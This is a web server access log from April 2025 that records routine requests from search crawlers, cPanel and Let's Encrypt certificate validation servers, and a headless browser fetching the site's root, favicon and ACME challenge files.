207.46.13.17 - - [11/Apr/2025:15:31:09 +0300] "GET /favicon.ico HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
52.167.144.16 - - [11/Apr/2025:15:31:05 +0300] "GET / HTTP/1.1" 200 27232 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
20.1.205.219 - - [11/Apr/2025:15:31:10 +0300] "GET /favicon.ico HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
51.8.102.19 - - [11/Apr/2025:16:56:22 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.89.113.223 - - [19/Apr/2025:12:49:41 +0300] "GET /.well-known/acme-challenge/3GZPLGIJK45I1PMN_1KG8F1J2X_TVNS- HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
51.89.113.223 - - [19/Apr/2025:12:49:41 +0300] "GET /.well-known/acme-challenge/YMH9ED92L5Y_9DICG4W3A-5UL7NTS9HU HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
44.242.192.189 - - [19/Apr/2025:12:49:46 +0300] "GET /.well-known/acme-challenge/kFnc5w_eMuHx0h5-pGZ7GO-RKQSERKI-7ckmW3ppb6w HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
16.171.1.142 - - [19/Apr/2025:12:49:47 +0300] "GET /.well-known/acme-challenge/TapZAS3hbE5gBAajNAnMBpdx5Fn1763Ld-N8v9T8ANM HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
3.134.82.66 - - [19/Apr/2025:12:49:47 +0300] "GET /.well-known/acme-challenge/TapZAS3hbE5gBAajNAnMBpdx5Fn1763Ld-N8v9T8ANM HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
13.212.231.23 - - [19/Apr/2025:12:49:47 +0300] "GET /.well-known/acme-challenge/TapZAS3hbE5gBAajNAnMBpdx5Fn1763Ld-N8v9T8ANM HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
195.123.244.84 - - [19/Apr/2025:12:50:26 +0300] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
195.123.244.84 - - [19/Apr/2025:12:50:26 +0300] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
23.178.112.211 - - [19/Apr/2025:12:49:45 +0300] "GET /.well-known/acme-challenge/kFnc5w_eMuHx0h5-pGZ7GO-RKQSERKI-7ckmW3ppb6w HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
16.170.242.134 - - [19/Apr/2025:12:49:45 +0300] "GET /.well-known/acme-challenge/kFnc5w_eMuHx0h5-pGZ7GO-RKQSERKI-7ckmW3ppb6w HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
3.15.160.232 - - [19/Apr/2025:12:49:46 +0300] "GET /.well-known/acme-challenge/kFnc5w_eMuHx0h5-pGZ7GO-RKQSERKI-7ckmW3ppb6w HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
54.179.203.208 - - [19/Apr/2025:12:49:46 +0300] "GET /.well-known/acme-challenge/kFnc5w_eMuHx0h5-pGZ7GO-RKQSERKI-7ckmW3ppb6w HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.214 - - [19/Apr/2025:12:49:46 +0300] "GET /.well-known/acme-challenge/TapZAS3hbE5gBAajNAnMBpdx5Fn1763Ld-N8v9T8ANM HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
44.242.192.189 - - [19/Apr/2025:12:49:47 +0300] "GET /.well-known/acme-challenge/TapZAS3hbE5gBAajNAnMBpdx5Fn1763Ld-N8v9T8ANM HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
34.122.147.229 - - [19/Apr/2025:12:51:52 +0300] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"